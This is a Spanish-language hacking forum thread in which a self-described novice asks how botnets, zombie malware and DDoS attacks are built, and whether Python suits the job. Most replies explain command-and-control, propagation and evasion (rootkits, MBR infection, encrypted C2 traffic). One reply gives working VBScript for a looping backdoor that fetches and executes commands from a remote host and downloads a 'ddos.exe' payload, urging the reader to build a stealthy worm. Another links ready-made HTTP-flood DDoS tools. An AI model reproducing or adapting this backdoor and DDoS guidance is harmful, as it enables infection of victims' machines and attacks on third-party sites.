dudas de un novato (DDos y Python)

Iniciado por Panic0, 7 Mayo 2021, 03:29 AM

0 Miembros y 1 Visitante están viendo este tema.

Panic0

Hola, tengo una duda, tengo entendido que un ddos envía varias solicitudes a una web, con la intención de desbordar la capacidad del sitio web para evitar que este funcione correctamente.

Duda 1
Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet?  

Duda 2
Una vez que se tiene una botnet como hace el atacante para enviarlos al sitio web que quiere atacar?

Duda 3
Esto se puede hacer con python o se necesita otro lenguaje?

No sé si me explique bien.

(Cabe aclarar que todo esto es con fines de aprendizaje, no tengo las neuronas suficientes como para hacer algo así)


Gracias, y buen día/noche
Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.

keef

Sigo siendo bastante novato en este mundo de la ciberseguridad, así que solo podré responderte con seguridad la pregunta 1 y 3.

Cita de: Panic0 en  7 Mayo 2021, 03:29 AM
Duda 1
Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet? 

Estos malwares, pueden presentarse en varias formas, por lo que tengo entendido, la mas común es el troyano.

Emotet, por ejemplo, era un troyano bancario que ingresaba a través de documentos PDF mayoritariamente.

Aunque una botnet puede usar los métodos de propagación típicos de un gusano informático para propagarse mas fácil y descontroladamente.

Cita de: Panic0 en  7 Mayo 2021, 03:29 AM
Duda 3
Esto se puede hacer con python o se necesita otro lenguaje?

Necesitas un lenguaje que utilice las apis win32 y que pueda acceder al sistema operativo y usar sus funciones, así que se podría decir que si, python puede ser utilizado para ese fin.

Saludos :rolleyes:

Panic0

Cita de: Nk en  7 Mayo 2021, 03:43 AM
Sigo siendo bastante novato en este mundo de la ciberseguridad, así que solo podré responderte con seguridad la pregunta 1 y 3.

Estos malwares, pueden presentarse en varias formas, por lo que tengo entendido, la mas común es el troyano.

Emotet, por ejemplo, era un troyano bancario que ingresaba a través de documentos PDF mayoritariamente.

Aunque una botnet puede usar los métodos de propagación típicos de un gusano informático para propagarse mas fácil y descontroladamente.

Necesitas un lenguaje que utilice las apis win32 y que pueda acceder al sistema operativo y usar sus funciones, así que se podría decir que si, python puede ser utilizado para ese fin.

Saludos :rolleyes:
Ahhhh bien bien, muchísimas gracias por responder!!

Que tengas un excelente día/noche!
Los ataques de pánico suelen comenzar de forma súbita, sin advertencia.

BloodSharp

Cita de: Panic0 en  7 Mayo 2021, 03:29 AMDuda 1
Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet?
Como un programa cualquiera, siempre y cuando tenga capacidad de conexión remota...

Cita de: Panic0 en  7 Mayo 2021, 03:29 AMDuda 2
Una vez que se tiene una botnet como hace el atacante para enviarlos al sitio web que quiere atacar?
Se lo especifica en el C2, dicho sea de paso puede estar escrito en casi cualquier protocolo, no necesariamente los que especifica ahí en wikipedia...

Cita de: Panic0 en  7 Mayo 2021, 03:29 AMDuda 3
Esto se puede hacer con python o se necesita otro lenguaje?
Sería recomendable algún lenguaje que pudiera acceder a la API del sistema operativo víctima para la parte del cliente y el servidor podría ser cualquier lenguaje que vos quieras...


B#



Xyzed

Hola.

Un ataque DDoS es un ataque de denegación de servicio distribuido. (Múltiples ordenadores/dispositivos incluidos en el ataque).
Un DoS es un ataque de denegación de servicio (Con un solo dispositivo puede realizarse).

Cita: Otro post donde consultaban algo similar (clickear hipervínculo de la cita).
Cita de: Xyzed en 15 Enero 2021, 17:34 PM

El malware puede estar escrito en cualquier lenguaje y sí, en Python puede ser.
Byob utiliza Python justamente para su funcionamiento.
Una vez infectado el ordenador, el atacante puede ejecutar el "ataque" de la forma que quiera.
Puede ser enviando simplemente paquetes o corriendo una tool en los ordenadores infectados.


Saludos.
...

Danielㅤ

#5
Hola, una botnet es como su nombre lo indica, una Red de bots, éstos bots son máquinas zombies de personas que tienen infectada su PC y que son controladas por la botnet del atacante para realizar ataques desde cientos o hasta miles de IPs/PCs infectadas.


1. Los malwares pueden ser de distritos tipos y se conectan a la botnet cuando la PC de la víctima se infecta y envía alguna petición/solicitud a la conexión remota del atacante para éste así saber, que ya tiene una nueva víctima.
Cuando el atacante recibide ese aviso puede saber opcionalmente datos de esa PC como por ejemplo, sistema operativo, versión del S.O., navegador que usa por defecto, softwares instalados, etc.

2. El malware instalado puede conectarse siempre al atacante y la víctima ni siquiera saberlo ni darse cuenta, por lo que el atacante cuando tiene un objetivo, lanza el ataque por ejemplo a un sitio web, pero el atacante no ataca directamente al sitio web, sinó que envía comandos/órdenes a la PCs infectadas/esclavas para que estas sean las que si se conecten al sitio web y asi saturen de peticiones masivas, por eso mientras más PCs infectadas tenga la botnet en su control, más fuerte será el ataque porque se podrán enviar más solicitudes.

Las PCs infectadas son controladas por el atacante por medio de un servidor de C&C (Comando y control):

https://es.wikipedia.org/wiki/Mando_y_control_(malware)

3. Si es posible hacerlo con Python, pero generalmente usan otro lenguaje como C, C++, C# o algún otro lenguaje compilado por ser más rápidos y potentes



Saludos
¡Regresando como cual Fenix! ~
Bomber Code © 2021 https://www.bombercode.net/foro/

Ayudas - Aportes - Tutoriales - Y mucho mas!!!

mchz

#6
Hola,

CitarDuda 1
Lo mas efectivo para lanzar un ddos se necesita una botnet, pero como se crea o se hace un malwere (Y que tipo de malwere es claro) para que convierta tu equipo en un ordenador zombi y como hacen estos ordenadores para que entren en una botnet?
Las botnets en esencia suelen ser equipos infectados de algún troyano o backdoor que una vez infectadas hace a estos dispositivos parte de la red (cabe destacar que pueden ser de distinta arquitectura Cliente-Servidor, Peer to Peer).

CitarDuda 2
Una vez que se tiene una botnet como hace el atacante para enviarlos al sitio web que quiere atacar?
Dependiendo de la arquitectura escogida, se requiere de un C&C (Servidor de mando y control), normalmente utilizan IRC, HTTP. Suelen usar DNS Dynamics gratuitas y un algoritmo de generación de subdominios que vinculan con la dirección IP de las máquinas infectadas (para P2P, tengo entendido que cargan una lista de las direcciones que se va compartiendo entre los nodos que conforman dicha red). Por IRC, crean un canal a las cuales se unen las máquinas infectadas esperando recibir ordenes. Aunque esos son los métodos que normalmente encuentras en Internet al describir el comportamiento de ese tipo de malware, es posible utilizar otros agentes para dirigir una botnet (incluso canales de telegram).

CitarDuda 3
Esto se puede hacer con python o se necesita otro lenguaje?
Sí.


Anexo   :P
Ahora, según la creatividad y las necesidades de cada autor varían en...
1. cifrado del tráfico de las ordenes enviadas por el C&C, suelen usar TLS, RC4, AES256, PublicKeys, RSA, DES, pueden verse de forma mixta y con ciertas modificaciones en la lógica del cifrado.

2. Métodos de antiforensia con compilaciones seguras aprovechando la entropía /dev/urandom para generar firmas indecifrables en el código.

3. Hacen mucho uso de la programación modular (ya que esto evita que puedan desmenuzar el funcionamiento interno de la botnet en un análisis estático por parte de un Research)

4. Algunos infectan la MBR y hacen uso de tecnologías rootkit para evitar ser detectado.
Ich bin wiedergeboren, ich bin zurück und gehe nicht. / Я возродился, я вернулся и не уйду. / I have been reborn, I have returned, and I will not leave.

John1Connor

Bueno, ya te aclararon en que consiste cada cosa. ahora te voy a contar cual es para mi la mejor opción.

Para hacer una botnet necesitas hacer un gusano (y no hay nada mejor que un lenguaje interpretado para eso), ese gusano debería ser bien sigiloso para infectar y reproducirse sin que las victimas se den cuenta dejando en cada ordenador infectado una "puerta trasera" abierta.

Para hacer un backdoor podes subir a un host un archivo en blanco (que luego vas a programar otro script dentro con comandos para descargar o ejecutar acciones en el pc infectado). Este archivo va a estar siendo checkeado y en caso de encontrar comandos dentro las ejecutara en el ordenador infectado dentro del script del gusano original.

Ejemplo de backdoor en vbs:
Código (vb) [Seleccionar]

Do
Dim oXMLHTTP : Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP"):
oXMLHTTP.Open "GET", "http://www.ejemplo.com/comandos.txt", False:
oXMLHTTP.Send:
ExecuteGlobal oXMLHTTP.responseText :
Wscript.Sleep 1000:
Loop


Una vez que tenes una buena red de zombies, cambias el archivo con los comandos del servidor y le pones lo que quieras que se ejecute.
Por ejemplo si queres que descargue un exe que realice un ataque DDos deberias poner este codigo en el txt que lee el backdoor y subir el ddos.exe al servidor

Código (vb) [Seleccionar]

Dim oXMLHTTP
Dim oStream
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP.3.0")
oXMLHTTP.Open "GET", "http://www.ejemplo.com/ddos.exe", False
oXMLHTTP.Send
If oXMLHTTP.Status = 200 Then
    Set oStream = CreateObject("ADODB.Stream")
    oStream.Open
    oStream.Type = 1
    oStream.Write oXMLHTTP.responseBody
    oStream.SaveToFile "ddos.exe"
    oStream.Close
End If



y bueno finalmente ejecutar el programa, script o comandos que quieras, deja volar tu imaginacion...


Saludos!

0x22

Respondiendo a tu duda 1, yo me se algunos rats que traen la funcion de hacer ataques ddos, son rats diseñados para hacer botnets

el-brujo

Hay un montón de scripts en Python para realizar ataques DDoS, no necesitas una botnet, basta con un listado grande servidores proxy's funcionando.

El método se llama Challenge Collapsar y es uno de los más sencillos y efectivos de realizar ataques layer 7, peticiones http.

CC (Challenge Collapsar) DDoS Script Code In Python3
https://github.com/GogoZin/Collapsar

Using Socks4/5 proxy to make a multithreading Http-flood/Https-flood (cc) attack.
https://github.com/Leeon123/CC-attack

Herramientas y métodos:
https://blog.elhacker.net/2021/09/ataques-denegacion-servicio-ddos-capa7-drddos-udp-capa3-4-herramientas.html

Mitigaciones:
https://blog.elhacker.net/2020/08/configuracion-avanzada-de-cloudflare-reglas-firewall-waf-detener-ataques-ddos-layer7.html